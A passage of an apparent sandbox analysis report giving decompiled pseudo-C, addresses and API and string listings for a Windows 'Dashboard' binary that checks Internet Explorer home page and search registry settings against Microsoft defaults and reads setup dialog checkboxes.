                                                                                                                    				void* _t134;
                                                                                                                    				void* _t135;
                                                                                                                    				signed int _t140;
                                                                                                                    				signed int _t146;
                                                                                                                    				signed int _t154;
                                                                                                                    
                                                                                                                    				_t135 = __eflags;
                                                                                                                    				_t124 = __edx;
                                                                                                                    				_push(0x10);
                                                                                                                    				E0100880F(E01016384, __ebx, __edi, __esi);
                                                                                                                    				 *((intOrPtr*)(_t134 - 0x14)) = 0;
                                                                                                                    				 *((intOrPtr*)(_t134 - 4)) = 0;
                                                                                                                    				E01004D33(_t134 - 0x18, 0x101a5f0);
                                                                                                                    				 *((char*)(_t134 - 4)) = 1;
                                                                                                                    				_t58 = E01010CBA(__ebx, __edx, 0, __esi, _t135);
                                                                                                                    				 *(_t134 - 0x10) = _t58;
                                                                                                                    				if(_t58 >= 0) {
                                                                                                                    					L29:
                                                                                                                    					E01004925( *((intOrPtr*)(_t134 - 0x18)) + 0xfffffff0, _t124);
                                                                                                                    					E0100C53D(_t134 - 0x14);
                                                                                                                    					return E010088FB( *(_t134 - 0x10));
                                                                                                                    				}
                                                                                                                    				 *(_t134 - 0x10) = 0;
                                                                                                                    				_t128 = E0100C55B(_t134 - 0x14, 0x80000001, L"Software\\Microsoft\\Internet Explorer\\Main", 0, 0, 0x2001f, 0, 0);
                                                                                                                    				_t137 = _t128;
                                                                                                                    				if(_t128 != 0) {
                                                                                                                    					L6:
                                                                                                                    					if(_t140 > 0) {
                                                                                                                    						_t128 = _t128 & 0x0000ffff | 0x80070000;
                                                                                                                    					}
                                                                                                                    					 *(_t134 - 0x10) = _t128;
                                                                                                                    					L9:
                                                                                                                    					if( *(_t134 - 0x10) < 0) {
                                                                                                                    						goto L29;
                                                                                                                    					}
                                                                                                                    					_t129 = E0100C55B(_t134 - 0x14, 0x80000001, L"Software\\Microsoft\\Internet Explorer\\Search", 0, 0, 0x2001f, 0, 0);
                                                                                                                    					_t143 = _t129;
                                                                                                                    					if(_t129 != 0) {
                                                                                                                    						L15:
                                                                                                                    						if(_t146 > 0) {
                                                                                                                    							_t129 = _t129 & 0x0000ffff | 0x80070000;
                                                                                                                    						}
                                                                                                                    						 *(_t134 - 0x10) = _t129;
                                                                                                                    						L18:
                                                                                                                    						if( *(_t134 - 0x10) < 0) {
                                                                                                                    							goto L29;
                                                                                                                    						}
                                                                                                                    						_t130 = E0100C55B(_t134 - 0x14, 0x80000001, L"Software\\Microsoft\\Internet Explorer\\SearchUrl", 0, 0, 0x2001f, 0, 0);
                                                                                                                    						_t149 = _t130;
                                                                                                                    						if(_t130 != 0) {
                                                                                                                    							L26:
                                                                                                                    							if(_t154 > 0) {
                                                                                                                    								_t130 = _t130 & 0x0000ffff | 0x80070000;
                                                                                                                    							}
                                                                                                                    							 *(_t134 - 0x10) = _t130;
                                                                                                                    							goto L29;
                                                                                                                    						}
                                                                                                                    						_push(0x100185c);
                                                                                                                    						E0100653B(0x80000001, _t134 - 0x1c, 0, _t130, _t149);
                                                                                                                    						 *((char*)(_t134 - 4)) = 4;
                                                                                                                    						_t130 = E010106BB( *((intOrPtr*)(_t134 - 0x14)), _t134 - 0x1c, _t134 - 0x18);
                                                                                                                    						 *((char*)(_t134 - 4)) = 1;
                                                                                                                    						E01004925( *((intOrPtr*)(_t134 - 0x1c)) + 0xfffffff0, _t124);
                                                                                                                    						if(_t130 != 0) {
                                                                                                                    							L25:
                                                                                                                    							E0100C53D(_t134 - 0x14);
                                                                                                                    							_t154 = _t130;
                                                                                                                    							if(_t154 == 0) {
                                                                                                                    								goto L29;
                                                                                                                    							}
                                                                                                                    							goto L26;
                                                                                                                    						}
                                                                                                                    						_t93 = __imp___wcsicmp;
                                                                                                                    						_t72 =  *_t93( *((intOrPtr*)(_t134 - 0x18)), L"http://home.microsoft.com/access/autosearch.asp?p=%s");
                                                                                                                    						_t151 = _t72;
                                                                                                                    						if(_t72 != 0) {
                                                                                                                    							L24:
                                                                                                                    							 *(_t134 - 0x10) = 1;
                                                                                                                    							goto L25;
                                                                                                                    						}
                                                                                                                    						_push(L"provider");
                                                                                                                    						E0100653B(_t93, _t134 - 0x1c, 0, _t130, _t151);
                                                                                                                    						 *((char*)(_t134 - 4)) = 5;
                                                                                                                    						_t130 = E010106BB( *((intOrPtr*)(_t134 - 0x14)), _t134 - 0x1c, _t134 - 0x18);
                                                                                                                    						E01004925( *((intOrPtr*)(_t134 - 0x1c)) + 0xfffffff0, _t124);
                                                                                                                    						if(_t130 != 0) {
                                                                                                                    							goto L25;
                                                                                                                    						}
                                                                                                                    						_push(L"msn");
                                                                                                                    						_push( *((intOrPtr*)(_t134 - 0x18)));
                                                                                                                    						if( *_t93() == 0) {
                                                                                                                    							goto L25;
                                                                                                                    						}
                                                                                                                    						goto L24;
                                                                                                                    					}
                                                                                                                    					_push(L"AutoSearch");
                                                                                                                    					E0100653B(0x80000001, _t134 - 0x1c, 0, _t129, _t143);
                                                                                                                    					 *((char*)(_t134 - 4)) = 3;
                                                                                                                    					_t129 = E010106BB( *((intOrPtr*)(_t134 - 0x14)), _t134 - 0x1c, _t134 - 0x18);
                                                                                                                    					 *((char*)(_t134 - 4)) = 1;
                                                                                                                    					_t83 = E01004925( *((intOrPtr*)(_t134 - 0x1c)) + 0xfffffff0, _t124);
                                                                                                                    					if(_t129 == 0) {
                                                                                                                    						__imp___wcsicmp( *((intOrPtr*)(_t134 - 0x18)), L"http://ie.search.msn.com/{SUB_RFC1766}/srchasst/saautosearch.aspx");
                                                                                                                    						if(_t83 != 0) {
                                                                                                                    							 *(_t134 - 0x10) = 1;
                                                                                                                    						}
                                                                                                                    					}
                                                                                                                    					E0100C53D(_t134 - 0x14);
                                                                                                                    					_t146 = _t129;
                                                                                                                    					if(_t146 == 0) {
                                                                                                                    						goto L18;
                                                                                                                    					} else {
                                                                                                                    						goto L15;
                                                                                                                    					}
                                                                                                                    				}
                                                                                                                    				_push(L"Search Page");
                                                                                                                    				E0100653B(0x80000001, _t134 - 0x1c, 0, _t128, _t137);
                                                                                                                    				 *((char*)(_t134 - 4)) = 2;
                                                                                                                    				_t128 = E010106BB( *((intOrPtr*)(_t134 - 0x14)), _t134 - 0x1c, _t134 - 0x18);
                                                                                                                    				 *((char*)(_t134 - 4)) = 1;
                                                                                                                    				_t89 = E01004925( *((intOrPtr*)(_t134 - 0x1c)) + 0xfffffff0, _t124);
                                                                                                                    				if(_t128 == 0) {
                                                                                                                    					__imp___wcsicmp( *((intOrPtr*)(_t134 - 0x18)), L"http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch");
                                                                                                                    					if(_t89 != 0) {
                                                                                                                    						 *(_t134 - 0x10) = 1;
                                                                                                                    					}
                                                                                                                    				}
                                                                                                                    				E0100C53D(_t134 - 0x14);
                                                                                                                    				_t140 = _t128;
                                                                                                                    				if(_t140 == 0) {
                                                                                                                    					goto L9;
                                                                                                                    				}
                                                                                                                    				goto L6;
                                                                                                                    			}
















                                                                                                                    0x01011039
                                                                                                                    0x01011039
                                                                                                                    0x01011039
                                                                                                                    0x01011040
                                                                                                                    0x01011047
                                                                                                                    0x01011052
                                                                                                                    0x01011055
                                                                                                                    0x0101105a
                                                                                                                    0x0101105e
                                                                                                                    0x01011065
                                                                                                                    0x01011068
                                                                                                                    0x01011271
                                                                                                                    0x01011277
                                                                                                                    0x0101127f
                                                                                                                    0x0101128c
                                                                                                                    0x0101128c
                                                                                                                    0x01011085
                                                                                                                    0x0101108d
                                                                                                                    0x0101108f
                                                                                                                    0x01011091
                                                                                                                    0x010110f0
                                                                                                                    0x010110f0
                                                                                                                    0x010110f8
                                                                                                                    0x010110f8
                                                                                                                    0x010110fe
                                                                                                                    0x01011101
                                                                                                                    0x01011104
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x01011121
                                                                                                                    0x01011123
                                                                                                                    0x01011125
                                                                                                                    0x01011184
                                                                                                                    0x01011184
                                                                                                                    0x0101118c
                                                                                                                    0x0101118c
                                                                                                                    0x01011192
                                                                                                                    0x01011195
                                                                                                                    0x01011198
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x010111b5
                                                                                                                    0x010111b7
                                                                                                                    0x010111b9
                                                                                                                    0x01011260
                                                                                                                    0x01011260
                                                                                                                    0x01011268
                                                                                                                    0x01011268
                                                                                                                    0x0101126e
                                                                                                                    0x00000000
                                                                                                                    0x0101126e
                                                                                                                    0x010111bf
                                                                                                                    0x010111c7
                                                                                                                    0x010111d7
                                                                                                                    0x010111e6
                                                                                                                    0x010111e8
                                                                                                                    0x010111ec
                                                                                                                    0x010111f3
                                                                                                                    0x01011254
                                                                                                                    0x01011257
                                                                                                                    0x0101125c
                                                                                                                    0x0101125e
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0101125e
                                                                                                                    0x010111f5
                                                                                                                    0x01011203
                                                                                                                    0x01011205
                                                                                                                    0x01011209
                                                                                                                    0x0101124d
                                                                                                                    0x0101124d
                                                                                                                    0x00000000
                                                                                                                    0x0101124d
                                                                                                                    0x0101120b
                                                                                                                    0x01011213
                                                                                                                    0x01011223
                                                                                                                    0x01011232
                                                                                                                    0x01011234
                                                                                                                    0x0101123b
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0101123d
                                                                                                                    0x01011242
                                                                                                                    0x0101124b
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0101124b
                                                                                                                    0x01011127
                                                                                                                    0x0101112f
                                                                                                                    0x0101113f
                                                                                                                    0x0101114e
                                                                                                                    0x01011150
                                                                                                                    0x01011154
                                                                                                                    0x0101115b
                                                                                                                    0x01011165
                                                                                                                    0x0101116f
                                                                                                                    0x01011171
                                                                                                                    0x01011171
                                                                                                                    0x0101116f
                                                                                                                    0x0101117b
                                                                                                                    0x01011180
                                                                                                                    0x01011182
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x01011182
                                                                                                                    0x01011093
                                                                                                                    0x0101109b
                                                                                                                    0x010110ab
                                                                                                                    0x010110ba
                                                                                                                    0x010110bc
                                                                                                                    0x010110c0
                                                                                                                    0x010110c7
                                                                                                                    0x010110d1
                                                                                                                    0x010110db
                                                                                                                    0x010110dd
                                                                                                                    0x010110dd
                                                                                                                    0x010110db
                                                                                                                    0x010110e7
                                                                                                                    0x010110ec
                                                                                                                    0x010110ee
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    • __EH_prolog3.LIBCMT ref: 01011040
                                                                                                                      • Part of subcall function 01010CBA: __EH_prolog3.LIBCMT ref: 01010CC1
                                                                                                                      • Part of subcall function 0100C55B: RegCreateKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000,?), ref: 0100C584
                                                                                                                    • _wcsicmp.MSVCR80 ref: 010110D1
                                                                                                                    • _wcsicmp.MSVCR80 ref: 01011165
                                                                                                                    • _wcsicmp.MSVCR80 ref: 01011203
                                                                                                                      • Part of subcall function 0100653B: __EH_prolog3.LIBCMT ref: 01006542
                                                                                                                      • Part of subcall function 010106BB: SHGetValueW.SHLWAPI(?,00000000,?,00000000,00000000,?), ref: 010106E0
                                                                                                                      • Part of subcall function 010106BB: SHGetValueW.SHLWAPI(?,00000000,?,00000000,00000000,00000000,?,00000000,00000000,?), ref: 01010714
                                                                                                                      • Part of subcall function 010106BB: ??_V@YAXPAX@Z.MSVCR80 ref: 01010730
                                                                                                                    • _wcsicmp.MSVCR80 ref: 01011245
                                                                                                                    Strings
                                                                                                                    • Search Page, xrefs: 01011093
                                                                                                                    • Software\Microsoft\Internet Explorer\Search, xrefs: 01011113
                                                                                                                    • Software\Microsoft\Internet Explorer\Main, xrefs: 01011077
                                                                                                                    • provider, xrefs: 0101120B
                                                                                                                    • msn, xrefs: 0101123D
                                                                                                                    • http://home.microsoft.com/access/autosearch.asp?p=%s, xrefs: 010111FB
                                                                                                                    • http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch, xrefs: 010110C9
                                                                                                                    • Software\Microsoft\Internet Explorer\SearchUrl, xrefs: 010111A7
                                                                                                                    • AutoSearch, xrefs: 01011127
                                                                                                                    • http://ie.search.msn.com/{SUB_RFC1766}/srchasst/saautosearch.aspx, xrefs: 0101115D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.259436616.0000000001001000.00000020.00000001.01000000.00000004.sdmp, Offset: 01000000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.259432248.0000000001000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259455281.000000000101A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259460165.000000000101B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_1000000_Dashboard.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcsicmp$H_prolog3$Value$Create
                                                                                                                    • String ID: AutoSearch$Search Page$Software\Microsoft\Internet Explorer\Main$Software\Microsoft\Internet Explorer\Search$Software\Microsoft\Internet Explorer\SearchUrl$http://home.microsoft.com/access/autosearch.asp?p=%s$http://ie.search.msn.com/{SUB_RFC1766}/srchasst/saautosearch.aspx$http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch$msn$provider
                                                                                                                    • API String ID: 2892520615-2298700832
                                                                                                                    • Opcode ID: f5152bee5913963a1c864a93d74e7dccb2edbd7c721527cac15ae48f85a027fd
                                                                                                                    • Instruction ID: 4b909bb22a64957543d9d646e162473eaaebfac2c8fd8a26875476c2192a1921
                                                                                                                    • Opcode Fuzzy Hash: f5152bee5913963a1c864a93d74e7dccb2edbd7c721527cac15ae48f85a027fd
                                                                                                                    • Instruction Fuzzy Hash: 6E61D771D0025B9AEF27E7A8CC94AFFBAB4AF64711F100259E6E0B71C4D7B90A44C791
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 79%
                                                                                                                    			E01011292(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                    				void* _t63;
                                                                                                                    				void* _t64;
                                                                                                                    				signed int _t69;
                                                                                                                    				signed int _t79;
                                                                                                                    				signed int _t80;
                                                                                                                    				void* _t84;
                                                                                                                    				void* _t88;
                                                                                                                    				signed int _t93;
                                                                                                                    				void* _t94;
                                                                                                                    				signed int _t96;
                                                                                                                    				signed int _t100;
                                                                                                                    				void* _t112;
                                                                                                                    				void* _t113;
                                                                                                                    				signed int _t117;
                                                                                                                    				void* _t119;
                                                                                                                    				signed int _t121;
                                                                                                                    				intOrPtr _t123;
                                                                                                                    				signed int _t124;
                                                                                                                    				signed int _t127;
                                                                                                                    				signed int _t128;
                                                                                                                    				void* _t129;
                                                                                                                    
                                                                                                                    				_t119 = __edx;
                                                                                                                    				_push(0x220);
                                                                                                                    				E01008882(E010163AF, __ebx, __edi, __esi);
                                                                                                                    				_t123 = __ecx;
                                                                                                                    				 *((intOrPtr*)(_t129 - 0x224)) = __ecx;
                                                                                                                    				_t63 =  *0x101a004; // 0x101a004
                                                                                                                    				_t121 = 0x101a004;
                                                                                                                    				if(_t63 == 0x101a004 || ( *(_t63 + 0x1c) & 0x00000008) == 0) {
                                                                                                                    					_t100 = 0x1002308;
                                                                                                                    				} else {
                                                                                                                    					_t100 = 0x1002308;
                                                                                                                    					_t5 = _t63 + 0x14; // 0x65637845
                                                                                                                    					_t6 = _t63 + 0x10; // 0x6c744143
                                                                                                                    					_t63 = E010049DE(_t63,  *_t6,  *_t5, 0xc, 0x1002308);
                                                                                                                    				}
                                                                                                                    				 *(_t129 - 0x21c) =  *(_t129 - 0x21c) & 0x00000000;
                                                                                                                    				if( *((intOrPtr*)(_t123 + 0x5c)) != 0) {
                                                                                                                    					_t64 = E0100CE8D(_t63, _t123);
                                                                                                                    					_t124 = __imp__?StrToID@DirectUI@@YGGPB_W@Z;
                                                                                                                    					_t66 = E0100C391( *_t124(_t64), _t65, L"idChkBoxSetHomePage");
                                                                                                                    					__eflags = _t66;
                                                                                                                    					if(_t66 != 0) {
                                                                                                                    						__eflags =  *(_t66 + 0x30) & 0x00000001;
                                                                                                                    						if(( *(_t66 + 0x30) & 0x00000001) != 0) {
                                                                                                                    							__eflags = E0100CA0C();
                                                                                                                    							if(__eflags == 0) {
                                                                                                                    								 *(_t129 - 0x21c) = E01010745(_t100, _t119, _t121, _t124, __eflags);
                                                                                                                    								_t66 =  *0x101a004; // 0x101a004
                                                                                                                    								__eflags = _t66 - _t121;
                                                                                                                    								if(_t66 != _t121) {
                                                                                                                    									__eflags =  *(_t66 + 0x1c) & 0x00000008;
                                                                                                                    									if(( *(_t66 + 0x1c) & 0x00000008) != 0) {
                                                                                                                    										_t19 = _t66 + 0x14; // 0x65637845
                                                                                                                    										_t20 = _t66 + 0x10; // 0x6c744143
                                                                                                                    										_t66 = E010090EF( *_t20,  *_t19, 0xd, _t100,  *(_t129 - 0x21c));
                                                                                                                    									}
                                                                                                                    								}
                                                                                                                    							}
                                                                                                                    						}
                                                                                                                    					}
                                                                                                                    					_t69 = E0100C391( *_t124(E0100CE8D(_t66,  *((intOrPtr*)(_t129 - 0x224)))), _t68, L"idChkBoxSearch");
                                                                                                                    					__eflags = _t69;
                                                                                                                    					if(_t69 == 0) {
                                                                                                                    						L19:
                                                                                                                    						_t124 = E0100C341(E0100CE8D(_t69,  *((intOrPtr*)(_t129 - 0x224))), L"idFeaturesCont", _t70);
                                                                                                                    						_t121 = 0;
                                                                                                                    						__eflags = _t124;
                                                                                                                    						if(_t124 == 0) {
                                                                                                                    							goto L37;
                                                                                                                    						}
                                                                                                                    						 *(_t129 - 0x228) = 0;
                                                                                                                    						 *(_t129 - 4) = 0;
                                                                                                                    						_t124 = E0100C7D1(E0100C768(_t129 - 0x228));
                                                                                                                    						__eflags = _t124;
                                                                                                                    						 *(_t129 - 0x22c) = _t124;
                                                                                                                    						if(_t124 == 0) {
                                                                                                                    							L35:
                                                                                                                    							_t107 =  *(_t129 - 0x228);
                                                                                                                    							 *(_t129 - 4) =  *(_t129 - 4) | 0xffffffff;
                                                                                                                    							__eflags =  *(_t129 - 0x228);
                                                                                                                    							if( *(_t129 - 0x228) != 0) {
                                                                                                                    								E0100C734(_t107);
                                                                                                                    							}
                                                                                                                    							goto L37;
                                                                                                                    						}
                                                                                                                    						__eflags =  *(_t124 + 8);
                                                                                                                    						 *(_t129 - 0x220) = 0;
                                                                                                                    						if( *(_t124 + 8) <= 0) {
                                                                                                                    							goto L35;
                                                                                                                    						} else {
                                                                                                                    							goto L22;
                                                                                                                    						}
                                                                                                                    						do {
                                                                                                                    							L22:
                                                                                                                    							_t100 =  *( *((intOrPtr*)(_t124 + 0x10)) +  *(_t129 - 0x220) * 4);
                                                                                                                    							__eflags = _t100;
                                                                                                                    							if(_t100 != 0) {
                                                                                                                    								_t79 = E0100D0E6(L"Checkbox", _t100);
                                                                                                                    								__eflags = _t79;
                                                                                                                    								if(_t79 != 0) {
                                                                                                                    									_t80 = E0100CA0C();
                                                                                                                    									__eflags = _t80;
                                                                                                                    									if(_t80 != 0) {
                                                                                                                    										_t121 =  *( *((intOrPtr*)(_t129 - 0x224)) + 0x5c);
                                                                                                                    										 *((intOrPtr*)( *_t121 + 0x24))(_t121, E0100C81B());
                                                                                                                    										_t84 = E0100C81B();
                                                                                                                    										_t112 = E0100ACC8(_t100);
                                                                                                                    										_t127 = E01014271(_t84);
                                                                                                                    										__eflags = _t127;
                                                                                                                    										if(_t127 >= 0) {
                                                                                                                    											_t113 = E0100ACC8(_t112);
                                                                                                                    											_t88 = E01014268();
                                                                                                                    											__eflags = _t127 - _t88;
                                                                                                                    											if(_t127 < _t88) {
                                                                                                                    												E0100ACC8(_t113);
                                                                                                                    												_t121 = E01014335(_t127);
                                                                                                                    												__eflags = _t121;
                                                                                                                    												if(_t121 != 0) {
                                                                                                                    													__imp__?StrToID@DirectUI@@YGGPB_W@Z(E0100CE8D(_t90,  *((intOrPtr*)(_t129 - 0x224))));
                                                                                                                    													_t128 = E0100C2F9(_t91, _t91, L"idProductListCont");
                                                                                                                    													__eflags = _t128;
                                                                                                                    													if(_t128 != 0) {
                                                                                                                    														__imp__?StrToID@DirectUI@@YGGPB_W@Z(_t128);
                                                                                                                    														_t93 = E0100C2F9(_t92, _t92, _t121);
                                                                                                                    														__eflags = _t93;
                                                                                                                    														if(_t93 != 0) {
                                                                                                                    															__imp__?Remove@Element@DirectUI@@QAEJPAV12@@Z(_t93);
                                                                                                                    															_t94 =  *0x101a004; // 0x101a004
                                                                                                                    															__eflags = _t94 - 0x101a004;
                                                                                                                    															if(_t94 != 0x101a004) {
                                                                                                                    																__eflags =  *(_t94 + 0x1c) & 0x00000008;
                                                                                                                    																if(( *(_t94 + 0x1c) & 0x00000008) != 0) {
                                                                                                                    																	_t50 = _t94 + 0x14; // 0x65637845
                                                                                                                    																	_t51 = _t94 + 0x10; // 0x6c744143
                                                                                                                    																	E01006C01( *_t51,  *_t50, 0xf, 0x1002308, _t121);
                                                                                                                    																}
                                                                                                                    															}
                                                                                                                    														}
                                                                                                                    													}
                                                                                                                    												}
                                                                                                                    											}
                                                                                                                    										}
                                                                                                                    										_t124 =  *(_t129 - 0x22c);
                                                                                                                    									}
                                                                                                                    								}
                                                                                                                    							}
                                                                                                                    							 *(_t129 - 0x220) =  *(_t129 - 0x220) + 1;
                                                                                                                    							__eflags =  *(_t129 - 0x220) -  *(_t124 + 8);
                                                                                                                    						} while ( *(_t129 - 0x220) <  *(_t124 + 8));
                                                                                                                    						goto L35;
                                                                                                                    					}
                                                                                                                    					__eflags =  *(_t69 + 0x30) & 0x00000001;
                                                                                                                    					if(( *(_t69 + 0x30) & 0x00000001) == 0) {
                                                                                                                    						goto L19;
                                                                                                                    					}
                                                                                                                    					_t117 = _t69;
                                                                                                                    					_t69 = E0100CA0C();
                                                                                                                    					__eflags = _t69;
                                                                                                                    					if(_t69 != 0) {
                                                                                                                    						goto L19;
                                                                                                                    					}
                                                                                                                    					_t96 = _t129 - 0x218;
                                                                                                                    					__imp__?RMLoadString@@YGIIPA_WIKPB_W@Z(7, _t96, 0x104, 0xf, _t69);
                                                                                                                    					__eflags = _t96;
                                                                                                                    					if(__eflags == 0) {
                                                                                                                    						goto L5;
                                                                                                                    					}
                                                                                                                    					 *(_t129 - 0x21c) = E01010E59(_t100, _t117, _t119, _t121, _t124, __eflags);
                                                                                                                    					_t69 =  *0x101a004; // 0x101a004
                                                                                                                    					__eflags = _t69 - _t121;
                                                                                                                    					if(_t69 != _t121) {
                                                                                                                    						__eflags =  *(_t69 + 0x1c) & 0x00000008;
                                                                                                                    						if(( *(_t69 + 0x1c) & 0x00000008) != 0) {
                                                                                                                    							_t31 = _t69 + 0x14; // 0x65637845
                                                                                                                    							_t32 = _t69 + 0x10; // 0x6c744143
                                                                                                                    							_t69 = E010090EF( *_t32,  *_t31, 0xe, _t100,  *(_t129 - 0x21c));
                                                                                                                    						}
                                                                                                                    					}
                                                                                                                    					goto L19;
                                                                                                                    				} else {
                                                                                                                    					L5:
                                                                                                                    					 *(_t129 - 0x21c) = 0x8000ffff;
                                                                                                                    					L37:
                                                                                                                    					return E01008914(_t100, _t121, _t124);
                                                                                                                    				}
                                                                                                                    			}
























                                                                                                                    0x01011292
                                                                                                                    0x01011292
                                                                                                                    0x0101129c
                                                                                                                    0x010112a1
                                                                                                                    0x010112a3
                                                                                                                    0x010112a9
                                                                                                                    0x010112ae
                                                                                                                    0x010112b5
                                                                                                                    0x010112d2
                                                                                                                    0x010112bd
                                                                                                                    0x010112bd
                                                                                                                    0x010112c5
                                                                                                                    0x010112c8
                                                                                                                    0x010112cb
                                                                                                                    0x010112cb
                                                                                                                    0x010112d7
                                                                                                                    0x010112e2
                                                                                                                    0x010112f5
                                                                                                                    0x010112fa
                                                                                                                    0x01011309
                                                                                                                    0x0101130e
                                                                                                                    0x01011310
                                                                                                                    0x01011312
                                                                                                                    0x01011316
                                                                                                                    0x0101131f
                                                                                                                    0x01011321
                                                                                                                    0x01011328
                                                                                                                    0x0101132e
                                                                                                                    0x01011333
                                                                                                                    0x01011335
                                                                                                                    0x01011337
                                                                                                                    0x0101133b
                                                                                                                    0x01011346
                                                                                                                    0x01011349
                                                                                                                    0x0101134c
                                                                                                                    0x0101134c
                                                                                                                    0x0101133b
                                                                                                                    0x01011335
                                                                                                                    0x01011321
                                                                                                                    0x01011316
                                                                                                                    0x01011365
                                                                                                                    0x0101136a
                                                                                                                    0x0101136c
                                                                                                                    0x010113cc
                                                                                                                    0x010113e2
                                                                                                                    0x010113e4
                                                                                                                    0x010113e6
                                                                                                                    0x010113e8
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x010113ee
                                                                                                                    0x010113fa
                                                                                                                    0x0101140a
                                                                                                                    0x0101140c
                                                                                                                    0x0101140e
                                                                                                                    0x01011414
                                                                                                                    0x01011537
                                                                                                                    0x01011537
                                                                                                                    0x0101153d
                                                                                                                    0x01011541
                                                                                                                    0x01011543
                                                                                                                    0x01011545
                                                                                                                    0x01011545
                                                                                                                    0x00000000
                                                                                                                    0x01011543
                                                                                                                    0x0101141a
                                                                                                                    0x0101141d
                                                                                                                    0x01011423
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x01011429
                                                                                                                    0x01011429
                                                                                                                    0x01011432
                                                                                                                    0x01011435
                                                                                                                    0x01011437
                                                                                                                    0x01011443
                                                                                                                    0x01011448
                                                                                                                    0x0101144a
                                                                                                                    0x01011452
                                                                                                                    0x01011457
                                                                                                                    0x01011459
                                                                                                                    0x01011465
                                                                                                                    0x01011476
                                                                                                                    0x0101147a
                                                                                                                    0x01011485
                                                                                                                    0x0101148c
                                                                                                                    0x0101148e
                                                                                                                    0x01011490
                                                                                                                    0x0101149b
                                                                                                                    0x0101149d
                                                                                                                    0x010114a2
                                                                                                                    0x010114a4
                                                                                                                    0x010114a7
                                                                                                                    0x010114b3
                                                                                                                    0x010114b5
                                                                                                                    0x010114b7
                                                                                                                    0x010114ca
                                                                                                                    0x010114d6
                                                                                                                    0x010114d8
                                                                                                                    0x010114da
                                                                                                                    0x010114de
                                                                                                                    0x010114e5
                                                                                                                    0x010114ea
                                                                                                                    0x010114ec
                                                                                                                    0x010114f1
                                                                                                                    0x010114f7
                                                                                                                    0x010114fc
                                                                                                                    0x01011501
                                                                                                                    0x01011503
                                                                                                                    0x01011507
                                                                                                                    0x01011511
                                                                                                                    0x01011514
                                                                                                                    0x01011517
                                                                                                                    0x01011517
                                                                                                                    0x01011507
                                                                                                                    0x01011501
                                                                                                                    0x010114ec
                                                                                                                    0x010114da
                                                                                                                    0x010114b7
                                                                                                                    0x010114a4
                                                                                                                    0x0101151c
                                                                                                                    0x0101151c
                                                                                                                    0x01011459
                                                                                                                    0x0101144a
                                                                                                                    0x01011522
                                                                                                                    0x0101152e
                                                                                                                    0x0101152e
                                                                                                                    0x00000000
                                                                                                                    0x01011429
                                                                                                                    0x0101136e
                                                                                                                    0x01011372
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x01011374
                                                                                                                    0x01011376
                                                                                                                    0x0101137b
                                                                                                                    0x0101137d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x01011387
                                                                                                                    0x01011390
                                                                                                                    0x01011396
                                                                                                                    0x01011398
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x010113a3
                                                                                                                    0x010113a9
                                                                                                                    0x010113ae
                                                                                                                    0x010113b0
                                                                                                                    0x010113b2
                                                                                                                    0x010113b6
                                                                                                                    0x010113c1
                                                                                                                    0x010113c4
                                                                                                                    0x010113c7
                                                                                                                    0x010113c7
                                                                                                                    0x010113b6
                                                                                                                    0x00000000
                                                                                                                    0x010112e4
                                                                                                                    0x010112e4
                                                                                                                    0x010112e4
                                                                                                                    0x0101154a
                                                                                                                    0x01011555
                                                                                                                    0x01011555

                                                                                                                    APIs
                                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 0101129C
                                                                                                                    • ?StrToID@DirectUI@@YGGPB_W@Z.UXCORE(idChkBoxSetHomePage,00000000), ref: 01011306
                                                                                                                    • ?StrToID@DirectUI@@YGGPB_W@Z.UXCORE(idChkBoxSearch,00000000), ref: 01011362
                                                                                                                    • ?RMLoadString@@YGIIPA_WIKPB_W@Z.UXCORE(00000007,?,00000104,0000000F,00000000), ref: 01011390
                                                                                                                      • Part of subcall function 010049DE: TraceMessage.ADVAPI32(?,?,0000002B,?,?,00000000), ref: 010049F3
                                                                                                                      • Part of subcall function 0100CA0C: ?GetValue@Element@DirectUI@@QBEPAVValue@2@PBUPropertyInfo@2@H@Z.UXCORE(703B85A8,00000002), ref: 0100CA16
                                                                                                                      • Part of subcall function 0100C81B: ?GetValue@Element@DirectUI@@QBEPAVValue@2@PBUPropertyInfo@2@H@Z.UXCORE(703B436C,00000002,?,0100CE37), ref: 0100C825
                                                                                                                      • Part of subcall function 0100ACC8: EnterCriticalSection.KERNEL32(0101A968), ref: 0100ACDE
                                                                                                                      • Part of subcall function 0100ACC8: LeaveCriticalSection.KERNEL32(0101A968), ref: 0100ACFB
                                                                                                                      • Part of subcall function 01014271: FindAtomW.KERNEL32(0101A528), ref: 01014285
